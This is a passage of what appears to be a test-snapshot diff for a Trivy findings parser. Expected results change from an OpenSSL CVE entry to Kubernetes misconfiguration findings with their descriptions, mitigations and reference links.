Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV015", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv015", + ], + }, + "category": "Misconfiguration", + "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set 'containers[].resources.requests.cpu'.", + "name": "CPU requests not specified(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'resources.requests.cpu')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://avd.aquasec.com/misconfig/ksv015", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'resources.requests.memory')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0040", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0040", + ], + }, + "category": "Misconfiguration", + "description": "Disable profiling, if not needed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Edit the Scheduler pod specification file /etc/kubernetes/manifests/kube-scheduler.yaml file on the Control Plane node and set the below parameter.", + "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://avd.aquasec.com/misconfig/kcv0040", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", + ], + }, + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", + ], + }, + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(Pod 'kube-scheduler-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.requests.memory')", + "references": [ { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-1", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-2", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0286", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2023-0286", - "https://access.redhat.com/security/cve/cve-2023-0286", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", - "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", - "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", - "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", - "https://linux.oracle.com/cve/CVE-2023-0286.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", - "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://ubuntu.com/security/notices/USN-5845-1", - "https://ubuntu.com/security/notices/USN-5845-2", - "https://www.cve.org/CVERecord?id=CVE-2023-0286", - "https://www.openssl.org/news/secadv/20230207.txt", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", ], }, - "category": "Vulnerability", - "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "X.400 address type confusion in X.509 GeneralName", + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(Pod 'kube-scheduler-kind-control-plane' should not set 'spec.template.volumes.hostPath')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0286", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": 